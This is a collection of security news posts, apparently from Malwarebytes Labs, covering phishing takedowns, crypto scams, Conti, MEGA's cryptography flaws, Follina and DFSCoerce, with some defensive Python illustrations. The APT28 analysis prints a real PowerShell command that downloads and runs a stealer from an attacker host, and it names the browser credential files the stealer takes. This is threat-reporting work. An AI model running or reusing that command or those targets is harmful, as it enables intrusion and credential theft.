IT NEWS

Police seize and dismantle massive phishing operation

Europol has coordinated a joint operation to arrest members of a cybercrime gang and effectively dismantle their campaigns, which netted millions of Euros. The operation also led the Belgian Police (Police Fédérale/Federale Politie) and the Dutch Police (Politie) to nine arrests, 24 house searches, and the seizure of firearms, ammunition, jewelry, electronic devices, cash, and cryptocurrency.

The group was involved in fraud, money laundering, phishing, and scams.

According to a Europol press release, the group’s modus operandi started with an email, text message, or private message containing a link to a phishing page.

Once recipients opened the link, they would be directed to a bogus bank website. Here, they were encouraged to enter their banking credentials. Money mules then used these credentials to cash out millions in Euros from victim accounts.

On top of fraud, the group was also involved in drug and possible firearms trafficking.

“Europol facilitated the information exchange, the operational coordination and provided analytical support for investigation,” reads the press release, revealing law enforcement involvement in the arrest operation. “During the operation, Europol deployed three experts to the Netherlands to provide real-time analytical support to investigators on the ground, forensics and technical expertise.”

The takedown of this phishing operation came months after Europol shut down the FluBot Android operation and the seizure of RaidForums, a hacking forum.

The post Police seize and dismantle massive phishing operation appeared first on Malwarebytes Labs.

Rogue cryptocurrency billboards go phishing for wallets

Billboards and digital real-world advertising have raised many questions of privacy and anonymity in recent years. Until now, the primary concern has been (mostly) legal, yet potentially objectionable, geolocation and user profiling. Bluetooth beacons work in tandem with geofenced billboards to send you offers. Stores follow your movements and tailor products accordingly, occasionally with very bad results. It’s such a common practice that you even see tracking-style digital advertising appearing in video games.

Attacks we’ve seen in the real world typically involve QR code stickers and take two main forms:

  • Letters or emails/chat app conversations which direct victims to Bitcoin ATMs. These attacks can often tie into money mule schemes.
  • Real world alteration/tampering of genuine QR codes. This can involve bogus QR code stickers placed over locations you’d expect to see a real code. Parking meters and car parks generally are prime targets for this type of scam.

We can now add rogue billboards to the list.

Beware of the party crashers

NFT NYC describes itself as “the leading annual non-fungible token event”. The 2022 meet-up is the fourth such event to take place. With NFTs hitting boiling point in the media, it’s natural to think scammers would turn their sights on the plundering of incredibly fungible apes and other items of a digital nature.

If you’re up to no good, and you know digital finance is filled with insecure coin-laden wallets and expensive jpegs, this is absolutely something you’re going to take an interest in.

Sure enough:

The screenshot is from a Discord channel, which says:

BE ALERT IF YOU ARE AT NFT NYC

Reports of scam billboards in NYC with QR codes leading to Wallet Drainer sites.

This is probably a good time to explain what a wallet drainer site is.

Of wallets and draining

Sadly, it seems nobody grabbed a photo of what these scam billboards look like. However, a “wallet drainer” is just another way of saying “phishing website”. There are three ways the majority of cryptocurrency phishes take place:

  1. Airdrop phishing. This can involve entering your wallet’s recovery phrase onto a fake website (don’t do this), or connecting your wallet directly to the phishing portal (don’t do this either).
  2. Bogus giveaways. These claim you’ll double your money, and often say they are endorsed by celebrities or Elon Musk.
  3. Rogue adverts. These bogus advertisements could lead you to either of the above, or even some completely unrelated technique.

People have confirmed in the replies to the original tweet that the theft here depended on victims scanning the code, and then clicking through to the phishing page. The phishing component depended on them manually entering their details into the fake website. It is not the case that simply visiting it would immediately drain funds or cause apes to go walkabout.

Rogue cryptocurrency billboards: A growing trend?

I’m wondering if this is the official cementing of rogue billboards as a digital finance scam technique. You may be surprised to learn this isn’t the first time someone has tried this.

Back in May, cryptocurrency exchange Binance warned of a rash of bogus billboards popping up in Turkey. Scam artists “plastered fake Binance billboards throughout the country”, many of which included a phone number answered by criminals behind the scheme.

The tactic used here was to convince unwary investors to hand over their seed/recovery phrases. Others were asked to register new accounts. Cryptocurrency scams involving new accounts tend to have funds deposited over time. Eventually the scammers have the victim transfer the funds to sites run exclusively by them. No matter which tactic is used, someone pulled in by the billboard has a strong chance of losing out.

This is clearly a technique which is working for phishers no matter the location. If you’re at an event or simply out and about and spot a cryptocurrency billboard, play it safe. Does the billboard mention a digital finance organisation? Check with the organisation if the URL is genuine. If you’re asked for seed/recovery phrases, don’t hand them over. Does the billboard make claims of doubling whatever you deposit? This is almost certainly a scam, especially if tied to a promotion from Elon Musk or TESLA.

Stay safe out there!


Dial 311 for… cybersecurity emergencies?

Members of the Cybersecurity Advisory Committee of CISA (Cybersecurity and Infrastructure Security Agency) have proposed an emergency cybersecurity call line for small and medium-sized businesses (SMBs). Should the proposition be approved, SMBs would be able to call 311 in the event of a cybersecurity incident.

CISA’s cyberhygiene subcommittee head, George Stathakopoulos, originally floated the idea that CISA should “launch a 311 national campaign, to provide an emergency call line and clinics for assistance following cyber incidents for small and medium businesses.” The communications subcommittee also floated a similar idea.

CISA and other cybersecurity experts have pushed for more robust incident response reporting. In March, President Joe Biden signed the Strengthening American Cybersecurity Act, a cyber incident reporting bill requiring critical infrastructure operators to report a breach to CISA within 72 hours, and 24 hours if they made a ransomware payment.

CISA Executive Assistant Director for Cybersecurity Eric Goldstein bemoaned how damaging it is for CISA to have so little data on ransomware attacks in the US. Speaking to attendees at RSA, Goldstein was quoted as saying:

“A tiny fraction of ransomware infections are reported to the government and the problem is getting worse because we don’t even know what that actual number is. We have no idea the actual denominator of ransomware instructions that are occurring across the country on any given day.”


Conti ransomware group’s pulse stops, but did it fake its own death?

The dark web leak site used by the notorious Conti ransomware gang has disappeared, along with the chat function it used to negotiate ransoms with victims. For as long as this infrastructure is down the group is unable to operate, and a significant threat is removed from the pantheon of ransomware threats.

The Conti leak site is down (June 22, 2022)

Ransomware gangs like Conti use the threat of leaking stolen data on their dark web sites to extort enormous ransoms from their victims, making the sites a vital cog in the ransomware machine.

While the cause of the site’s disappearance isn’t known for sure, and criminal dark web sites are notoriously flaky, there is good reason to suspect that Conti has gone permanently.

However, while anything that stops Conti from terrorising businesses, schools, and hospitals is welcome, the disappearance of its leak site is unlikely to make potential ransomware victims any safer, sadly.

As we explained in our May ransomware review, recent research by Advintel suggests that Conti has spent the last few months executing a bizarre plan to fake its own death. If that is what’s happened, then the gang’s members have simply dispersed to other ransomware “brands” that are either operated by the Conti gang or affiliated to it.

Conti—as bad as they come

The gang behind Conti ransomware (called WizardSpider, although rarely referred to by that name) is believed to be based in Russia, and first appeared in 2020. The FBI recently called it “the costliest strain of ransomware ever documented,” and the US Department of State is offering a reward of up to $10 million for “information leading to the identification and/or location of any individual(s) who hold a key leadership position in the Conti ransomware variant transnational organized crime group.”

Conti has been used in a number of high profile attacks, including a devastating assault on Ireland’s Health Service Executive on May 14, 2021. The attack disrupted healthcare in Ireland for months and the recovery effort could end up costing the country more than $100 million.

The real cost of the attack was measured in human suffering though. Speaking to Malwarebytes Labs, a doctor in one of the affected hospitals described how a 21st-century healthcare system deprived of its computers is brought to its knees. The attack caused enormous unnecessary suffering for both patients and healthcare professionals, and triggered hundreds of thousands of appointments to be cancelled.

The doctor’s brutal assessment of the Conti gang? “I think they lost their humanity.”

Faking its own death

According to Advintel, the Conti gang sealed its fate in February when it published a message in support of Russia’s invasion of Ukraine, declaring its “full support of Russian government.” By aligning itself to the Russian state it had made itself the subject of sanctions. Victims were not prepared to run the risk that their ransom payments might be treated as sanctions violations and Conti’s income dried up.

Ransomware gangs often react to trouble by going dark, or with ham-fisted attempts to pretend they’ve retired. These retirements are often quickly followed by the sudden appearance of a brand new ransomware gang that is obviously just the old gang working under a new name.

Advintel’s research suggested that Conti was aware of this pattern and determined to try something different. Instead of disappearing and then popping up a week later under a new name, the group created and operated new brands—Advintel names KaraKurt, BlackByte, and BlackBasta as examples—before retiring the Conti name, to make the transition less obvious. In addition to creating these new brands, it also dispersed parts of its workforce into existing gangs it had a relationship with, such as Hive and ALPHV.

To complete the deception, it maintained a skeleton crew that carried out extremely noisy, headline-grabbing attacks on Costa Rica, and continued to operate the leak site until the last moment.

Malwarebytes Threat Intelligence was able to independently confirm that Conti sent an internal announcement about its retirement to affiliates at the end of May, and that its internal chat servers stopped working around the same time.

The site had been inactive for 28 days before it disappeared, with the last new leak appearing on May 25. As our May ransomware report revealed, despite the noise it generated from its attacks on Costa Rica, Conti’s activity was significantly depressed in May, while the activity of gangs with alleged links to Conti increased, driven largely by the rise of BlackBasta.

Known ransomware attacks in May 2022


MEGA claims it can’t decrypt your files. But someone’s managed to…

MEGA, the cloud storage provider and file hosting service, is very proud of its end-to-end encryption. It says it couldn’t decrypt your stored files, even if it wanted to.

“All your data on MEGA is encrypted with a key derived from your password; in other words, your password is your main encryption key. MEGA does not have access to your password or your data. Using a strong and unique password will ensure that your data is protected from being hacked and gives you total confidence that your information will remain just that – yours.”

But there’s a problem. A Swiss team of researchers has just proved those claims wrong.

And that’s not all. The research went one step further, finding that an attacker could insert malicious files into the storage, passing all authenticity checks of the client.

Cryptography flaws

Researchers at the Department of Computer Science of the ETH Zurich in Zurich, Switzerland reviewed the security of MEGA and found significant issues in how it uses cryptography.

These findings could lead to devastating attacks on the confidentiality and integrity of user data in the MEGA cloud.

Key hierarchy

The MEGA client derives an authentication key and an encryption key from the password. The authentication key identifies users to MEGA. The encryption key encrypts a randomly generated master key, which in turn encrypts other key material of the user. Every account has a set of asymmetric keys: An RSA key pair for sharing data, a Curve25519 key pair for exchanging chat keys for MEGA’s chat functionality, and an Ed25519 key pair for signing the other keys. Furthermore, the client generates a new key for every file or folder (collectively referred to as nodes) uploaded by the user.

Long story short, all the keys are derived in one way or another from the password. And all the keys get stored on MEGA’s servers to support access from multiple devices.

Ciphertext

Ciphertext is encrypted text transformed from plaintext using an encryption algorithm. The researchers built two attacks based on the lack of integrity protection of ciphertexts containing keys, and two further attacks to breach the integrity of file ciphertexts and allow a malicious service provider to insert chosen files into a user’s cloud storage.

Attacks

Due to the flawed integrity protection, a malicious service provider can recover a user’s private RSA share key (used to share file and folder keys) over 512 login attempts. The number is 512 because the RSA-CRT implementation used by MEGA clients lets the attacker build an oracle that leaks one bit of information about a factor of the RSA modulus per login attempt.

As a result the malicious service provider can recover any plaintext encrypted with AES-ECB under a user’s master key. This includes all node keys used for encrypting files and folders. As a consequence, the confidentiality of all user data protected by these keys, such as files and chat messages, is lost.

Based on the first two attacks, a malicious service provider can construct an encrypted file. The user cannot demonstrate that they didn’t upload the forged data because the files and keys are indistinguishable from genuinely uploaded ones. It needs no further explanation that introducing a malicious file in such an attack could further compromise not only the user’s system, but also the systems of those the user has shared their files or folders with.
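The key hierarchy and the missing integrity protection described above, as an added illustration (not the researchers’ code or MEGA’s): a password-derived key-encryption key wraps node keys, once with plain ECB and once with an encrypt-then-MAC tag. A toy Feistel block cipher stands in for AES so the example runs on the standard library; the PBKDF2 parameters, the salt and the key sizes are assumptions.

```python
import hashlib
import hmac
import secrets

BLOCK = 16

# Toy 16-byte block cipher: a 4-round Feistel network with an HMAC-SHA256 round function.
# It stands in for AES only so the example runs on the standard library; what matters
# here is the mode, not the cipher: ECB encrypts each block independently and nothing
# checks the ciphertext on the way back in.
def _round(key: bytes, i: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r

def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r

def ecb_encrypt(key: bytes, data: bytes) -> bytes:
    assert len(data) % BLOCK == 0, "key material is always a whole number of blocks"
    return b"".join(block_encrypt(key, data[i:i + BLOCK]) for i in range(0, len(data), BLOCK))

def ecb_decrypt(key: bytes, data: bytes) -> bytes:
    assert len(data) % BLOCK == 0
    return b"".join(block_decrypt(key, data[i:i + BLOCK]) for i in range(0, len(data), BLOCK))

def derive_keys(password: str, salt: bytes) -> tuple:
    """Password -> (authentication key, key-encryption key, MAC key), following the
    hierarchy described above: one key identifies the user to the server, another wraps
    the random master key. PBKDF2-SHA256 with this salt/iteration count is an assumption."""
    material = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000, 48)
    return material[:16], material[16:32], material[32:]

def wrap_ecb(kek: bytes, node_keys: bytes) -> bytes:
    """Weak setting: node keys wrapped under the master key with ECB and no integrity tag."""
    return ecb_encrypt(kek, node_keys)

def unwrap_ecb(kek: bytes, blob: bytes) -> bytes:
    return ecb_decrypt(kek, blob)  # any block-aligned ciphertext "decrypts fine"

def wrap_authenticated(kek: bytes, mac_key: bytes, node_keys: bytes) -> bytes:
    """Hardened setting: encrypt-then-MAC, so stored key blobs cannot be altered unnoticed."""
    ct = ecb_encrypt(kek, node_keys)
    return ct + hmac.new(mac_key, ct, hashlib.sha256).digest()

def unwrap_authenticated(kek: bytes, mac_key: bytes, blob: bytes) -> bytes:
    ct, tag = blob[:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(mac_key, ct, hashlib.sha256).digest(), tag):
        raise ValueError("stored key blob failed its integrity check")
    return ecb_decrypt(kek, ct)

def swap_first_two_blocks(blob: bytes) -> bytes:
    """The kind of change a storage server that holds the ciphertext could make to it."""
    return blob[BLOCK:2 * BLOCK] + blob[:BLOCK] + blob[2 * BLOCK:]

def demo() -> tuple:
    """Returns (ecb_tamper_unnoticed, authenticated_tamper_detected)."""
    _auth_key, kek, mac_key = derive_keys("correct horse battery staple", b"constructed-salt")
    key_a, key_b = secrets.token_bytes(BLOCK), secrets.token_bytes(BLOCK)  # two node keys
    stored = wrap_ecb(kek, key_a + key_b)
    # After the blocks are swapped, the client silently uses key_b for file A and vice versa.
    ecb_unnoticed = unwrap_ecb(kek, swap_first_two_blocks(stored)) == key_b + key_a
    try:
        tampered = swap_first_two_blocks(wrap_authenticated(kek, mac_key, key_a + key_b))
        unwrap_authenticated(kek, mac_key, tampered)
        detected = False
    except ValueError:
        detected = True
    return ecb_unnoticed, detected
```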

MEGA’s response

MEGA acknowledged the issue on March 24, 2022, and released patches on June 21, 2022, awarding the researchers a bug bounty. But MEGA’s fix differs greatly from what the researchers proposed, patching only the first attack, on the grounds that the other attacks rely on it.

Since that does not fix the key reuse issue, lack of integrity checks, and other systemic problems the researchers identified, this remains a source of concern for them.

Regular MEGA users have no reason to worry about these flaws, especially if they haven’t logged in more than 512 times. An attacker would need to have control over MEGA’s API servers or TLS connections without being noticed to perform any of these attacks.

Anyone interested in more technical details can read the researchers’ paper.


Watch out for the email that says “You have a new voicemail!”

A phishing campaign is using voicemail notification messages to go after victims’ Office 365 credentials.

According to researchers at Zscaler, the campaign uses spoofed emails with an HTML attachment that contains encoded JavaScript.

The email claims that you have a new voicemail and that you can listen to the message by clicking on the attachment. To add credibility, the name of the attachment starts with a music note character such as ♫ to make it look like a sound clip. In reality, it is an HTML file with obfuscated JavaScript embedded.

The JavaScript uses the window.location.replace method to redirect the target to a specially crafted phishing page. Access to the page is behind a reCAPTCHA, probably to keep out bots, particularly automated URL analysis tools.

Spoofed email

Email spoofing basically comes down to sending emails with a false sender address. This can be used in various ways by attackers. Obviously pretending to be someone else can have its advantages especially if that someone else holds a position of power or trust with regards to the receiver.

In this campaign the threat actors use a name in the “From” field of the email aligned with the targeted organization’s name. An internal mail is more likely to be trusted by the receiver. Analysis of the email headers shows that the attacker leveraged email servers located in Japan.

Targets

The final credential phishing page attempts to steal the Office 365 credentials of the users by presenting them with a fake login screen. The redirection URL includes the target’s email address, base64 encoded, likely so the attackers will be able to match the victim with their login credentials.

The researchers found the campaign targeting organizations in the US military, security software developers and providers, healthcare and pharmaceutical, and supply-chain organizations in manufacturing and shipping.
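The three tells described above (an organisation-style display name on an external address, an HTML attachment named like a sound clip that redirects with JavaScript, and the recipient’s address base64-encoded in the redirect URL) as detection logic over a constructed message; this is an added example, not Zscaler’s or Malwarebytes’ code, and the sample mail, addresses and domains are made up.

```python
import base64
import binascii
import re
from email.message import EmailMessage
from email.utils import parseaddr

# Characters the campaign prepends to attachment names so they look like sound clips.
MUSIC_NOTES = "\u266a\u266b\u266c"  # ♪ ♫ ♬
REDIRECT_RE = re.compile(r"(?:window\.)?location\.(?:replace|assign|href)", re.I)
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

def build_sample_message() -> EmailMessage:
    """Constructed lure modelled on the campaign described above (not a real capture).
    The display name copies the recipient's organisation, the attachment is HTML named
    like a sound clip, and it redirects with the target's address base64-encoded."""
    msg = EmailMessage()
    msg["From"] = "Example Corp Voicemail <noreply@mailer-relay.invalid>"
    msg["To"] = "alice@example-corp.invalid"
    msg["Subject"] = "You have a new voicemail!"
    msg.set_content("You have a new voicemail (0:47). Open the attachment to listen.")
    target = base64.b64encode(b"alice@example-corp.invalid").decode()
    html = ('<html><script>window.location.replace('
            f'"https://phish.invalid/login#{target}");</script></html>')
    msg.add_attachment(html, subtype="html", filename="\u266b Voicemail-0047.html")
    return msg

def decode_b64_email(token: str):
    """Return the address if token is the base64 encoding of an e-mail address, else None."""
    try:
        decoded = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return decoded if EMAIL_RE.match(decoded) else None

def org_label(address: str) -> str:
    """'alice@example-corp.invalid' -> 'examplecorp', for loose display-name matching."""
    domain = address.rsplit("@", 1)[-1].split(".")[0]
    return re.sub(r"[^a-z0-9]", "", domain.lower())

def analyze(msg: EmailMessage) -> list:
    """Return a list of human-readable findings; an empty list means nothing matched."""
    findings = []
    from_name, from_addr = parseaddr(msg.get("From", ""))
    _, to_addr = parseaddr(msg.get("To", ""))
    if to_addr and from_addr:
        label = org_label(to_addr)
        name_norm = re.sub(r"[^a-z0-9]", "", from_name.lower())
        if label and label in name_norm and org_label(from_addr) != label:
            findings.append(f"display name {from_name!r} mimics the recipient's "
                            f"organisation but the sender domain is external")
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        body = part.get_content()
        if isinstance(body, bytes):
            body = body.decode("utf-8", "replace")
        if name and name[0] in MUSIC_NOTES:
            findings.append(f"attachment disguised as a sound clip: {name!r}")
        if part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html")):
            findings.append(f"HTML attachment: {name!r}")
            if REDIRECT_RE.search(body):
                findings.append("HTML attachment performs a JavaScript redirect")
            for run in B64_RUN_RE.findall(body):
                addr = decode_b64_email(run)
                if addr:
                    findings.append(f"redirect embeds the base64-encoded address {addr}")
    return findings
```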

How to avoid being phished

  • Do not open unverified email attachments. If someone you know sends you an attachment you’re not expecting, check it is really them via another contact method.
  • Do not enter your credentials before checking the actual URL of the site.
  • If you use a password manager that autofills your login details, it will not enter your credentials on a phishing site because it will have a different URL. This is a really handy giveaway that something is up.
  • Enable 2-factor authentication (2FA). If you hand over your password to a phishing page, the phisher can’t do much with it while you’re protected with 2FA. This isn’t foolproof though, as some phishing sites will also try to steal your 2FA codes.

Stay safe, everyone!


7-Zip gets Mark of the Web feature, increases protection for users

One of the most popular zip programs around, 7-Zip, now offers support for “Mark of the Web” (MOTW), which gives users better protection from malicious files.

This is good news. But what does that actually mean?

In the bad old days, opening up a downloaded document could be a fraught exercise. Malicious files would often have full permission from the system to do whatever they wanted. Compromised PCs were the inevitable end result, and infected attachments were extremely popular. Outside of regular security tools, there often wasn’t much else available to help stop the flow.

Microsoft’s file block feature in 2007 meant network administrators could lock down any attempt to open specific file types. Unfortunately, this was a little too restrictive for some users. Files couldn’t be opened, even in cases where the user knew they were safe.

Microsoft changed things up a little in 2010, with Protected View.

Protected View: what is it?

Every time you download a spreadsheet or Word document and open it up, some checking takes place in the background. Downloaded files produce a yellow bar with the following message:

Protected View: Be careful. Files from the internet can contain viruses. Unless you need to edit, it’s safer to stay in Protected View.

This isn’t too different to the old file block feature, with a few key differences. Firstly, you can actually look at the document you want to open. As it is locked into a read-only mode, it can’t do anything malicious to your system. Secondly, users now have the option to enable editing. While there are other potentially dangerous aspects to opening downloaded files, Microsoft has solutions for those too. There is, of course, something telling these programs to warn you about potentially dangerous files. This is where MOTW comes into play.

How does Mark of the Web help?

MOTW is perhaps most recently known for blocking VBA code from running in Office. When a file is downloaded, Windows adds a ZoneId to the file which is responsible for the warning message(s). When the system detects the mark, the yellow bar is replaced by a red one. Unlike its yellow counterpart, there is no enable content button. Those files are done, with no way back.

Right click a file you’ve downloaded, and in General properties you should see a message which reads:

This file came from another computer and might be blocked to help protect this computer.

This exists thanks to MOTW.

The mark doesn’t exist on the file itself, which is left untouched. Originally an Internet Explorer security feature, you’ll now find it keeping you from harm’s way across the Microsoft product range.
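The ZoneId the article refers to lives in the file’s Zone.Identifier alternate data stream on NTFS. As an added example (not from the article or from 7-Zip), here is a parser for that stream and a helper that reads it from a file on Windows; the sample stream content and the URLs in it are constructed.

```python
import configparser
import sys

# URLZONE values as they appear in the Zone.Identifier stream.
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}
STREAM_NAME = "Zone.Identifier"

# Constructed stream content, shaped like what a browser writes for a download.
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.invalid/downloads/\r\n"
    "HostUrl=https://example.invalid/downloads/report.docx\r\n"
)

def parse_zone_identifier(text: str) -> dict:
    """Parse the INI-style Zone.Identifier stream into a small dict."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.read_string(text)
    if "ZoneTransfer" not in cp:
        raise ValueError("no [ZoneTransfer] section: not a Zone.Identifier stream")
    section = cp["ZoneTransfer"]
    zone_id = int(section.get("ZoneId", "-1"))
    return {
        "zone_id": zone_id,
        "zone_name": ZONE_NAMES.get(zone_id, "unknown"),
        "referrer_url": section.get("ReferrerUrl"),
        "host_url": section.get("HostUrl"),
        # Office opens files from the Internet (3) and Restricted sites (4) zones in Protected View.
        "protected_view": zone_id >= 3,
    }

def read_mark(path: str):
    """Read the mark from a file's Zone.Identifier alternate data stream (Windows/NTFS only).
    Returns None when the file carries no mark, which is what you saw after extracting an
    archive with a 7-Zip version that did not propagate MOTW."""
    if sys.platform != "win32":
        raise OSError("alternate data streams are only readable on Windows/NTFS")
    try:
        with open(f"{path}:{STREAM_NAME}", encoding="utf-8", errors="replace") as stream:
            return parse_zone_identifier(stream.read())
    except FileNotFoundError:
        return None
```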

Is this new addition a benefit for a zip program?

Absolutely. As noted by Bleeping Computer, MOTW didn’t apply to files extracted with 7-Zip. As a result, you’d have Office files opening as if you’d created them yourself with no Protected View in sight.

With this now enabled in the latest version of 7-Zip, some key Windows security precautions are now back in place.

There are some caveats to this story. As we know, not everybody pays attention to security warnings. Computer users routinely ignore all manner of security alerts from their operating system, browser, and security tools. The design and placement of warnings can further deter people from paying attention to them. On top of all that, bogus security warnings can make things even more confusing for users.

No matter how many warning messages are displayed, some people will still click “Enable” on files they shouldn’t. Even so, opening downloaded files with restrictions applied from the get-go can only be a good thing.


Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine

This blog post was authored by Hossein Jazi and Roberto Santos.

In a recent campaign, APT28, an advanced persistent threat actor linked with Russian intelligence, set its sights on Ukraine, targeting users with malware that steals credentials stored in browsers.

APT28 (also known as Sofacy and Fancy Bear) is a notorious Russian threat actor that has been active since at least 2004 with its main activity being collecting intelligence for the Russian government. The group is known to have targeted US politicians, and US organizations, including US nuclear facilities.

On June 20, 2022, Malwarebytes Threat Intelligence identified a document that had been weaponized with the Follina (CVE-2022-30190) exploit to download and execute a new .Net stealer first reported by Google. The discovery was also made independently by CERT-UA.

Follina is a recently-discovered zero-day exploit that uses the ms-msdt protocol to load malicious code from Word documents when they are opened. This is the first time we’ve observed APT28 using Follina in its operations.

The malicious document

The maldoc’s filename, Nuclear Terrorism A Very Real Threat.rtf, attempts to get victims to open it by preying on their fears that the invasion of Ukraine will escalate into a nuclear conflict.

The content of the document is an article from the Atlantic Council called “Will Putin use nuclear weapons in Ukraine? Our experts answer three burning questions” published on May 10 this year.

The lure asks “Will Putin use nuclear weapons in Ukraine?”

The maldoc is an RTF file compiled on June 10, which suggests that the attack was used around the same time. It uses a remote template embedded in the Document.xml.rels file to retrieve a remote HTML file from the URL http://kitten-268.frge.io/article.html.

The malicious HTML document

The HTML file uses a JavaScript call to window.location.href to load and execute an encoded PowerShell script using the ms-msdt MSProtocol URI scheme. The decoded script uses cmd to run PowerShell code that downloads and executes the final payload:

"C:\WINDOWS\system32\cmd.exe" /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command "& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile "C:\Users\$ENV:UserName\SQLite.Interop.dll";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile "C:\Users\$ENV:UserName\docx.exe";Start-Process "C:\Users\$ENV:UserName\docx.exe"}"

Payload Analysis

The final payload is a variant of a stealer APT28 has used against targets in Ukraine before. In the oldest variant, the stealer used a fake error message to hide what it was doing (A secondary thread was displaying this error message while the main program continued executing.) The new variant does not show the popup.

In older versions of the stealer, a fake error message distracted users

The variant used in this attack is almost identical to the one reported by Google, with just a few minor refactors and some additional sleep commands.

A side-by-side comparison of two versions of the APT28 stealer

As with the previous variant, the stealer’s main purpose is to steal data from several popular browsers.

Google Chrome and Microsoft Edge

The malware steals any website credentials (username, password, and URL) users have saved in the browser by reading the contents of %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data.

Debugging session showing how attackers are capable of stealing credentials

In a very similar way, the new variant also grabs all the saved cookies stored in Google Chrome by accessing %LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies.

Cookie stealing code (Google Chrome)

Stolen cookies can sometimes be used to break into websites even if the username and password aren’t saved to the browser.

The code to steal cookies and passwords from the Chromium-based Edge browser is almost identical to the code used for Chrome.

Firefox

This malware can also steal data from Firefox. It does this by iterating through every profile looking for the cookies.sqlite file that stores the cookies for each user.

Sysmon capturing access to the cookies.sqlite file

In the case of passwords, the attackers attempt to steal logins.json, key3.db, key4.db, cert8.db, cert9.db, signons.sqlite.

Attackers also grab passwords from Firefox

These files are necessary for recovering elements like saved passwords and certificates. Older profile formats are also supported (signons.sqlite, key3.db and cert8.db are no longer used by current Firefox versions). Note that if the user has set a master password, the attackers will likely attempt to crack this password offline, later, to recover these credentials.

Exfiltrating data

The malware uses the IMAP email protocol to exfiltrate data to its command and control (C2) server.

The IMAP login event

The old variant of this stealer connected to mail[.]sartoc.com (144.208.77.68) to exfiltrate data. The new variant uses the same method but a different domain, www.specialityllc[.]com. Interestingly both are located in Dubai.

It’s likely the owners of the C2 websites have nothing to do with APT28, and the group simply took advantage of abandoned or vulnerable sites.

Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence. The target, and the involvement of APT28 (a division of Russian military intelligence), suggest that the campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state. Ukraine continues to be a battleground for cyberattacks and espionage, as well as devastating kinetic warfare and humanitarian abuses.

For more coverage of threat actors active in the Ukraine conflict, read our recent article about the efforts of an unknown APT group that has targeted Russia repeatedly since the invasion of Ukraine.

Protection

Malwarebytes customers were proactively protected against this campaign thanks to our anti-exploit protection.

Malwarebytes Nebula protects against the APT28 campaign

IOCs

Maldoc:
Nuclear Terrorism A Very Real Threat.rtf
daaa271cee97853bf4e235b55cb34c1f03ea6f8d3c958f86728d41f418b0bf01

Remote template (Follina):
http://kitten-268.frge[.]io/article.html

Stealer:
http://kompartpomiar[.]pl/grafika/docx.exe
2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933

C2:
www.specialityllc[.]com


DFSCoerce, a new NTLM relay attack, can take control over a Windows domain

A researcher has published a Proof-of-Concept (PoC) for an NTLM relay attack dubbed DFSCoerce. The method leverages the Distributed File System: Namespace Management Protocol (MS-DFSNM) to seize control of a Windows domain.

Active Directory

A directory service is a hierarchical arrangement of objects which is structured in a way that makes access easy. Windows Active Directory (AD) is a directory service provided by Microsoft and developed for Windows domains. Basically, it is a central database which gets contacted before a user is granted access to a resource or a service. Organizations primarily use AD to perform authentication and authorization.

Many large organizations depend on Windows Active Directory (AD) to maintain order in the mountain of work involved in managing users, computers, permissions, and file servers.

NTLM

NTLM is short for New Technology LAN Manager. NTLM is the successor to the authentication protocol in Microsoft LAN Manager (LANMAN). NTLM is a protocol that uses a challenge and response method to authenticate a client.

  1. First, the client establishes a network path to the server and sends a NEGOTIATE_MESSAGE advertising its capabilities.
  2. Next, the server responds with CHALLENGE_MESSAGE which is used to establish the identity of the client.
  3. Finally, the client responds to the challenge with an AUTHENTICATE_MESSAGE.

The NTLM protocol uses one or both of two hashed password values. Both hashes are also stored on the server (or domain controller), and because they are not salted they are password equivalent, meaning that if you grab the hash value from the server, you can authenticate without knowing the actual password.

NTLM relay attack

NTLM relay attacks allow attackers to steal hashed versions of user passwords, and relay clients’ credentials in an attempt to authenticate to servers. They use a Machine-in-the-Middle method that allows threat actors to sit between clients and servers and intercept and relay validated authentication requests in order to gain unauthorized access to network resources.

PetitPotam is an example of an NTLM relay attack that prompted Microsoft to send out an advisory telling system administrators to stop using the now deprecated Windows NT LAN Manager (NTLM) in order to thwart such attacks. PetitPotam used the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC) to execute an NTLM relay attack.

The DFSCoerce script is based on the PetitPotam exploit, but instead of using MS-EFSRPC, it uses MS-DFSNM, a protocol that allows the Windows Distributed File System (DFS) to be managed over a remote procedure call (RPC) interface.

[Image: tweet by Filip Dragovic, the researcher who discovered DFSCoerce]

Other methods

Other protocols threat actors could use for the same purpose include MS-RPRN and MS-FSRVP, and the researcher has now added MS-DFSNM to the list of applicable protocols, a list which researchers expect to grow even more. The Distributed File System Namespace Management (DFSNM) protocol is one of a collection of protocols that group shares located on different servers by combining various storage media into a single logical namespace. The DFS namespace is a virtual view of the share: when a user views the namespace, the directories and files in it appear to reside on a single share.

Mitigation

